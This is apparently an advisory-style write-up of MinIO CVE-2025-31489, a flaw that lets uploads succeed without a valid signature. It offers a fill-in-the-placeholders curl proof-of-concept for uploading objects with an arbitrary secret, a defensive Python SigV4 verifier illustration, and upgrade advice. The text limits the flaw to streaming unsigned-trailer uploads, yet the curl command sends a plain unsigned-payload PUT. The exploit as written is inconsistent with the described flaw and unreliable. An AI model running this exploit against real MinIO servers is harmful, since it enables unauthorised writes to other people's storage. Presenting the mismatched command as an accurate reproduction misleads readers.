MinIO is a high-performance object storage server released under the GNU Affero General Public License v3.0. It is designed to be cloud-native and exposes an Amazon S3-compatible API. A vulnerability, CVE-2025-31489, was recently disclosed in which the signature component of the Authorization header is not properly validated. An attacker who knows an access key ID and a bucket name, where that access key has WRITE permission on the bucket, can upload objects without knowing the matching secret key. The issue is fixed in RELEASE.2025-04-03T14-56-28Z.

Vulnerability Details

A client that signs a request with an arbitrary secret can upload objects to a MinIO bucket because the server does not validate the signature it receives. The attacker needs the access key ID (not the secret key) and the bucket name, and that access key must already have WRITE permission on the bucket. The upstream MinIO advisory scopes the flaw to unsigned-trailer uploads (the streaming `STREAMING-UNSIGNED-PAYLOAD-TRAILER` mode), which is the code path whose signature check was incomplete.

With that information in hand, uploading arbitrary objects to the bucket takes a single curl command.

The following shell snippet demonstrates the issue with curl:

# Variables
ACCESS_KEY="<access_key_here>"
BUCKET_NAME="<bucket_name_here>"
FILE_PATH="<path_to_object_here>"
ENDPOINT="<minio_endpoint_here>"
ARBITRARY_SECRET="<arbitrary_secret_here>"

# SigV4 date values must be UTC; the Date header must be an RFC 1123 date.
HTTP_DATE="$(date -u '+%a, %d %b %Y %H:%M:%S GMT')"
DATE_STAMP="$(date -u +%Y%m%d)"

# Any value works here because the vulnerable server never checks it.
# 'openssl dgst' prefixes its output with "(stdin)= ", so keep only the hex digest.
SIGNATURE="$(printf '%s' 'UNSIGNED-PAYLOAD' | openssl dgst -sha256 -hmac "${ARBITRARY_SECRET}" | awk '{print $NF}')"

# Exploiting the issue (SignedHeaders must be listed in sorted order)
curl -v -X PUT -T "${FILE_PATH}" --location "http://${ENDPOINT}/${BUCKET_NAME}/$(basename "${FILE_PATH}")" \
  -H "Host: ${ENDPOINT}" \
  -H "Date: ${HTTP_DATE}" \
  -H "x-amz-content-sha256: UNSIGNED-PAYLOAD" \
  -H "Authorization: AWS4-HMAC-SHA256 Credential=${ACCESS_KEY}/${DATE_STAMP}/us-east-1/s3/aws4_request, SignedHeaders=date;host;x-amz-content-sha256, Signature=${SIGNATURE}"

Replace the placeholders in angle brackets with real values before running the command.
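To make clear what a correct server-side check has to do, and why an arbitrary secret must fail it, here is a minimal AWS Signature Version 4 signer and verifier for a single S3 PUT. This is an added illustration written for this page; it is not MinIO's code and does not reproduce MinIO's internals. The access key, secret, host, bucket and object name are constructed placeholders. `verify_put` recomputes the signature from the secret the server holds for the access key and compares it in constant time; `verify_key_only` is a deliberately weak contrast that only checks the access key exists, which is the observable effect of accepting an invalid signature.

```python
"""Minimal AWS SigV4 signing and verification for one S3 PUT (illustration only)."""
import hashlib
import hmac
from typing import Dict, List

REGION = "us-east-1"
SERVICE = "s3"

# Constructed credentials for this example only (not real keys).
STORED_SECRETS: Dict[str, str] = {"AKIAEXAMPLE": "correct-secret-for-AKIAEXAMPLE"}


def _sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _hmac(key: bytes, msg: str) -> bytes:
    return hmac.new(key, msg.encode("utf-8"), hashlib.sha256).digest()


def signing_key(secret: str, date_stamp: str) -> bytes:
    """SigV4 key derivation: "AWS4"+secret -> date -> region -> service -> aws4_request."""
    k_date = _hmac(("AWS4" + secret).encode("utf-8"), date_stamp)
    k_region = _hmac(k_date, REGION)
    k_service = _hmac(k_region, SERVICE)
    return _hmac(k_service, "aws4_request")


def compute_signature(secret: str, method: str, uri: str, headers: Dict[str, str],
                      signed_headers: List[str]) -> str:
    """Hex signature over the canonical request built from the signed headers."""
    amz_date = headers["x-amz-date"]            # e.g. 20250403T145628Z
    date_stamp = amz_date[:8]
    scope = f"{date_stamp}/{REGION}/{SERVICE}/aws4_request"
    canonical_headers = "".join(f"{h}:{headers[h].strip()}\n" for h in signed_headers)
    canonical_request = "\n".join([
        method, uri, "",                         # empty query string
        canonical_headers, ";".join(signed_headers),
        headers["x-amz-content-sha256"],         # UNSIGNED-PAYLOAD or the payload hash
    ])
    string_to_sign = "\n".join([
        "AWS4-HMAC-SHA256", amz_date, scope, _sha256_hex(canonical_request.encode("utf-8")),
    ])
    return hmac.new(signing_key(secret, date_stamp), string_to_sign.encode("utf-8"),
                    hashlib.sha256).hexdigest()


def sign_put(access_key: str, secret: str, host: str, bucket: str, key: str,
             amz_date: str) -> Dict[str, str]:
    """Client side: the headers a curl PUT /bucket/key would carry."""
    signed = ["host", "x-amz-content-sha256", "x-amz-date"]     # sorted, as SigV4 requires
    headers = {"host": host, "x-amz-content-sha256": "UNSIGNED-PAYLOAD", "x-amz-date": amz_date}
    sig = compute_signature(secret, "PUT", f"/{bucket}/{key}", headers, signed)
    headers["authorization"] = (
        f"AWS4-HMAC-SHA256 Credential={access_key}/{amz_date[:8]}/{REGION}/{SERVICE}/aws4_request, "
        f"SignedHeaders={';'.join(signed)}, Signature={sig}"
    )
    return headers


def parse_authorization(value: str) -> Dict[str, str]:
    """Split 'AWS4-HMAC-SHA256 Credential=..., SignedHeaders=..., Signature=...'."""
    algo, _, rest = value.partition(" ")
    if algo != "AWS4-HMAC-SHA256":
        raise ValueError("unsupported algorithm")
    return dict(p.strip().split("=", 1) for p in rest.split(","))


def verify_put(method: str, uri: str, headers: Dict[str, str], secrets: Dict[str, str]) -> bool:
    """Server side: accept only if the signature was made with the stored secret."""
    try:
        auth = parse_authorization(headers["authorization"])
        access_key, date_stamp, region, service, term = auth["Credential"].split("/")
        signed = auth["SignedHeaders"].split(";")
        if access_key not in secrets:
            return False
        if (region, service, term) != (REGION, SERVICE, "aws4_request"):
            return False
        if date_stamp != headers["x-amz-date"][:8]:
            return False
        if not {"host", "x-amz-date", "x-amz-content-sha256"} <= set(signed) or signed != sorted(signed):
            return False
        expected = compute_signature(secrets[access_key], method, uri, headers, signed)
    except (KeyError, ValueError):
        return False
    # Constant-time comparison; a mismatch must reject the request.
    return hmac.compare_digest(expected, auth["Signature"])


def verify_key_only(headers: Dict[str, str], secrets: Dict[str, str]) -> bool:
    """Weak check for contrast: trusts any request naming a known access key and
    never looks at the signature. Illustrative only, not MinIO's code."""
    try:
        access_key = parse_authorization(headers["authorization"])["Credential"].split("/")[0]
    except (KeyError, ValueError):
        return False
    return access_key in secrets


if __name__ == "__main__":
    host, bucket, key, when = "minio.example:9000", "backups", "notes.txt", "20250403T145628Z"
    genuine = sign_put("AKIAEXAMPLE", STORED_SECRETS["AKIAEXAMPLE"], host, bucket, key, when)
    forged = sign_put("AKIAEXAMPLE", "arbitrary_secret", host, bucket, key, when)
    uri = f"/{bucket}/{key}"
    print("genuine, strict check:", verify_put("PUT", uri, genuine, STORED_SECRETS))  # True
    print("forged, strict check:", verify_put("PUT", uri, forged, STORED_SECRETS))    # False
    print("forged, key-only check:", verify_key_only(forged, STORED_SECRETS))          # True
```

The forged request differs from the genuine one only in the 64-hex-character Signature value, which is exactly what the curl command above leaves arbitrary; a server that skips the recomputation cannot tell the two apart.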

For more information about this issue, refer to the following resources:

1. MinIO Official Website: https://min.io/
2. GNU Affero General Public License v3.0: https://www.gnu.org/licenses/agpl-3.0.en.html
3. CVE-2025-31489 Official Description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31489
4. MinIO RELEASE.2025-04-03T14-56-28Z Release Notes: https://github.com/minio/minio/releases/tag/RELEASE.2025-04-03T14-56-28Z

Conclusion

CVE-2025-31489 allows an attacker who holds only an access key ID and a bucket name to upload objects to MinIO buckets with an invalid authorization signature. Upgrade MinIO to RELEASE.2025-04-03T14-56-28Z or later to fix the issue; until the upgrade is done, treat access key IDs as sensitive and review which keys hold WRITE permission on each bucket. Keep your MinIO instance up to date and follow MinIO's security best practices.

Timeline

Published on: 04/03/2025 20:15:25 UTC
Last modified on: 04/07/2025 14:18:34 UTC